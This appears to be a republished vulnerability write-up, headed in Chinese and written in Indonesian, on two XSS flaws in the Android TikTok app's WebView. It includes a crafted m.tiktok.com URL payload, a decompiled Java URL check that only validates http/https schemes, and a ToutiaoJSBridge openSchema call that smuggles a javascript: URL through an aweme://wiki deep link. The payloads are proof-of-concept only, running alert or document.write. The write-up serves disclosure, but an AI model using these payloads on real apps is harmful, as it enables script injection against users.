安卓版TikTok_XSS漏洞_id

# 安卓版TikTok XSS漏洞/id

== XSS Generik di TikTok WebView ==

https://m.tiktok.com/falcon/#'),alert(1));//

Eksekusi berikut akan dipicu:

JSON.stringify(window.performance.getEntriesByName('https://m.tiktok.com/falcon/#'),alert(1));//'))

==Add Wiki Activity的另一個XSS==
Tambahkan Aktivitas Wiki menerapkan verifikasi URL untuk memastikan bahwa URL dalam daftar hitam tidak akan dibuka di dalamnya. Namun verifikasi hanya dilakukan pada skema http atau https. Karena mereka yakin program lain tidak valid dan tidak perlu diverifikasi.

if(!e.b(arg8)) {
com.bytedance.t.c.e.b.a(“AbsSecStrategy”, “needBuildSecLink : url is invalid.”);
return false;
}public static boolean b(String arg1) {
return !TextUtils.isEmpty(arg1) && ((arg1.startsWith(“http”)) || (arg1.startsWith(“https”))) && !e.a(arg1);
}

Meskipun verifikasi tidak didasarkan pada solusi javascript, solusi ini juga dapat digunakan untuk melakukan serangan XSS di WebView.

window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3EPoC%3C%2Fh1%3E%22)&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
}));
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容